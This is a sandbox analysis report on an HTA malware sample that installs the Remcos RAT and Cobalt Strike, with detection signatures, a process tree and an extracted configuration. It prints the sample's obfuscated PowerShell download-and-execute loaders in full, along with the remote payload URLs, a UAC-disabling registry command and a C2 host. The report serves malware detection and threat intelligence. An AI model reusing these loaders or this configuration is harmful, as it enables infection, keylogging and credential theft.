Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
na.hta

Overview

General Information

Sample name:na.hta
Analysis ID:1533059
MD5:52bb72daa6c16c09d4298bd59e12b7d9
SHA1:2e4aef7df584acaadb5a6e555d6e2f40ae12b6f1
SHA256:8fbf6165b0751a47bf9842011e82c4a7715cc879fd7272b45ab549df6e813e46
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 3788 cmdline: mshta.exe "C:\Users\user\Desktop\na.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 3812 cmdline: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2228 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 5016 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 1776 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC057.tmp" "c:\Users\user\AppData\Local\Temp\p44lx5ym\CSC1BDFD807A6FD4EDC87F258A79D1E57AA.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • wscript.exe (PID: 7156 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 3840 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • RegAsm.exe (PID: 3092 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • RegAsm.exe (PID: 4072 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\icthiyu" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • RegAsm.exe (PID: 6500 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\swyajqfles" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • RegAsm.exe (PID: 5352 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\swyajqfles" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • RegAsm.exe (PID: 5704 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vzdkjbynsalyk" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "idabo.duckdns.org:6875:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I89M3S", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.4471996980.00000000013EC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6c4b8:$a1: Remcos restarted by watchdog!
            • 0x6ca30:$a3: %02i:%02i:%02i:%03i
            Click to see the 26 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            11.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              11.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                11.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  11.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6c4b8:$a1: Remcos restarted by watchdog!
                  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
                  11.2.RegAsm.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x6657c:$str_b2: Executing file:
                  • 0x675fc:$str_b3: GetDirectListeningPort
                  • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x67128:$str_b7: \update.vbs
                  • 0x665a4:$str_b9: Downloaded file:
                  • 0x66590:$str_b10: Downloading file:
                  • 0x66634:$str_b12: Failed to upload file:
                  • 0x675c4:$str_b13: StartForward
                  • 0x675e4:$str_b14: StopForward
                  • 0x67080:$str_b15: fso.DeleteFile "
                  • 0x67014:$str_b16: On Error Resume Next
                  • 0x670b0:$str_b17: fso.DeleteFolder "
                  • 0x66624:$str_b18: Uploaded file:
                  • 0x665e4:$str_b19: Unable to delete:
                  • 0x67048:$str_b20: while fso.FileExists("
                  • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 18 entries

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi32_3812.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
                    amsi32_4720.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Base64 Encoded PowerShell Command Detected
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydElu
                      Sigma detected: Potential PowerShell Command Line Obfuscation
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,
                      Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
